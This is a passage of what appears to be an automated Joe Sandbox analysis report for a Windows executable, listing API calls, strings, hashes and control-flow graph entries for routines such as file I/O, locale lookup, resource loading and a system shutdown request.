                                                                  • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                  • String ID: D
                                                                  • API String ID: 3356880605-2746444292
                                                                  • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                  • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                  • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                  • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: .tmp$y@
                                                                  • API String ID: 2030045667-2396523267
                                                                  • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                  • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                  • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                  • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: .tmp$y@
                                                                  • API String ID: 2030045667-2396523267
                                                                  • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                  • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                                  • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                                  • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID: .tmp
                                                                  • API String ID: 1375471231-2986845003
                                                                  • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                  • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                                  • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                                  • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                  • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                  • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                  • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLibraryLoadMode
                                                                  • String ID:
                                                                  • API String ID: 2987862817-0
                                                                  • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                  • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                  • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                  • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FilePointer
                                                                  • String ID:
                                                                  • API String ID: 1156039329-0
                                                                  • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                  • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                  • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                  • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastRead
                                                                  • String ID:
                                                                  • API String ID: 1948546556-0
                                                                  • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                  • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                  • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                  • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                  • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FilePointer
                                                                  • String ID:
                                                                  • API String ID: 1156039329-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2087232378-0
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                    • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                  Similarity
                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                  • String ID:
                                                                  • API String ID: 1658689577-0
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID:
                                                                  • API String ID: 442123175-0
                                                                  APIs
                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                  Similarity
                                                                  • API ID: FormatMessage
                                                                  • String ID:
                                                                  • API String ID: 1306739567-0
                                                                  APIs
                                                                  • SetEndOfFile.KERNEL32(?,02188000,0040A08C,00000000), ref: 004076B3
                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                  Similarity
                                                                  • API ID: ErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 734332943-0
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  APIs
                                                                  • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                  Similarity
                                                                  • API ID: CharPrev
                                                                  • String ID:
                                                                  • API String ID: 122130370-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                  • String ID: SeShutdownPrivilege
                                                                  • API String ID: 107509674-3733053543
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                  • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCloseHandleModuleProc
                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                  • API String ID: 4190037839-2401316094
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                  • String ID:
                                                                  • API String ID: 1694776339-0
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                    • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$DefaultSystem
                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 1044490935-665933166
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                  • LocalFree.KERNEL32(006EF6D0,00000000,00401AB4), ref: 00401A1B
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,006EF6D0,00000000,00401AB4), ref: 00401A3A
                                                                  • LocalFree.KERNEL32(006F06D0,?,00000000,00008000,006EF6D0,00000000,00401AB4), ref: 00401A79
                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                  • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                  • String ID:
                                                                  • API String ID: 3782394904-0
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                  • ExitProcess.KERNEL32 ref: 00403DE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ExitMessageProcess
                                                                  • String ID: Error$Runtime error at 00000000$9@
                                                                  • API String ID: 1220098344-1503883590
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                  • String ID:
                                                                  • API String ID: 262959230-0
                                                                  APIs
                                                                  • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
